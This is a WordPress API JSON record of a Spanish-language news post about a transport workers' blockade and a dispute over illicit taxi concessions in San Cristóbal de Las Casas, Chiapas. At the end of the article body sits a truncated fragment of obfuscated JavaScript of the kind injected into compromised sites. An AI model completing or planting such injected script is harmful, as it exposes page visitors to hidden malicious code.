{"id":3098,"date":"2022-06-22T02:18:41","date_gmt":"2022-06-22T02:18:41","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=3098"},"modified":"2022-06-22T02:18:42","modified_gmt":"2022-06-22T02:18:42","slug":"transportistas-logran-acuerdo-con-autoridades-tras-larga-protesta","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=3098","title":{"rendered":"Transportistas logran acuerdo con autoridades tras larga protesta"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-21-at-3.26.29-PM-1024x768.jpeg\" alt=\"\" class=\"wp-image-3099\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-21-at-3.26.29-PM-1024x768.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-21-at-3.26.29-PM-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-21-at-3.26.29-PM-768x576.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-21-at-3.26.29-PM-1536x1153.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-21-at-3.26.29-PM.jpeg 1599w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>21 de junio del 2022. San Crist\u00f3bal de Las Casas. &#8211; Juan Carlos Trujillo, delegado regional del Transporte, se\u00f1al\u00f3 que se encuentran dando atenci\u00f3n al tema, lo cual se est\u00e1 arrastrando de administraciones pasadas, \u201cahora nos toca hacer frente a esta situaci\u00f3n donde supuestamente existen anomal\u00edas, nos han pedido los operativos correspondientes, y contamos con personal de apoyo que mand\u00f3 la coordinaci\u00f3n de delegados para dar la atenci\u00f3n en tiempo y forma a los transportistas\u201d.<\/p>\n\n\n\n<p>En entrevista, durante una manifestaci\u00f3n de transportistas, indic\u00f3 que se logr\u00f3 la detenci\u00f3n de una unidad que ya est\u00e1 puesta a disposici\u00f3n de las autoridades correspondientes, \u201cextraoficialmente se hablaba de 7 taxis y 40 combis, sin embargo, nosotros no las hemos visto f\u00edsicamente, vimos algunas y logramos asegurar una combi, los taxis no los hemos visualizado, pero personal de Tuxtla va estar en el municipio para que consecuencia se proceda conforme a derecho\u201d.<\/p>\n\n\n\n<p>\u201cLas demandas est\u00e1n siendo analizadas conforme a derecho, para efecto de que tengan una legalidad en el proceso administrativo del concesionamiento, la anterior ley del transporte le daba muchas atribuciones a los transportistas a trav\u00e9s de plebiscitos, entonces no podemos responsabilizar a la autoridad, ya que eran los mismos transportistas determinaban qui\u00e9n sal\u00eda concesionado, con la nueva ley se le da certeza al transportista que ha luchado por una para poder trabajar\u201d, abund\u00f3.<\/p>\n\n\n\n<p>Y es que transportistas de esta ciudad mantuvieron un bloqueo sobre la Prolongaci\u00f3n Ignacio Allende a la altura de la Plaza de Toros y el Parque de Feria, como medida de protesta ante el supuesto concesionamiento de 40 unidades m\u00e1s entre urvan y taxis y despu\u00e9s de ser atendidos por las autoridades se retiraron.<\/p>\n\n\n\n<p>Al respecto, Andr\u00e9s G\u00f3mez, l\u00edder de la Organizaci\u00f3n Transportista Emiliano Zapata (OTEZ), se\u00f1al\u00f3 que se trata de un fraude, ya que desde hace tres a\u00f1os se dio concesi\u00f3n a cuatro sociedades cooperativas ilegales, constituidas apenas en 2020 y dadas a conocer apenas ante la Secretar\u00eda de Hacienda con emplacamiento de concesiones de 1986.<\/p>\n\n\n\n<p>Precis\u00f3 que se unieron diferentes l\u00edderes del transporte, para evitar que Mario G\u00f3mez o \u201cEl Contador\u201d como es conocido, se apodere de concesiones que se ignora c\u00f3mo se las hayan dado.<\/p>\n\n\n\n<p>Es de mencionar fue pasada las 12 del d\u00eda, cuando arrib\u00f3 a esta ciudad, Aquiles Espinoza Garc\u00eda secretario de transporte y movilidad urbana del Estado de Chiapas, quien tras una reuni\u00f3n con l\u00edderes del transporte en esta ciudad, se comprometi\u00f3 a revisar e investigar sobre las 40 concesiones que fueron \u201cotorgadas de manera il\u00edcita\u201d.<\/p>\n\n\n\n<p>Se comprometi\u00f3 a castigar al responsable o responsables por la liberaci\u00f3n de las concesiones, ya sea su personal o personas ajenas, lo que logr\u00f3 que el grupo de transportistas aceptar\u00e1n y posteriormente se retiraran del lugar, as\u00ed como de la calle Ignacio Allende y estacionamiento del parque de feria.&nbsp;<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez 21 de junio del 2022. San Crist\u00f3bal de Las Casas. &#8211; Juan Carlos Trujillo, delegado regional del Transporte, se\u00f1al\u00f3 que se encuentran dando atenci\u00f3n al tema, lo cual se est\u00e1 arrastrando de administraciones pasadas, \u201cahora nos toca hacer frente a esta situaci\u00f3n donde supuestamente existen anomal\u00edas, nos han pedido los operativos correspondientes, y &hellip;<\/p>\n","protected":false},"author":2,"featured_media":3099,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-3098","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3098","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3098"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3098\/revisions"}],"predecessor-version":[{"id":3100,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3098\/revisions\/3100"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/3099"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3098"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3098"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3098"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}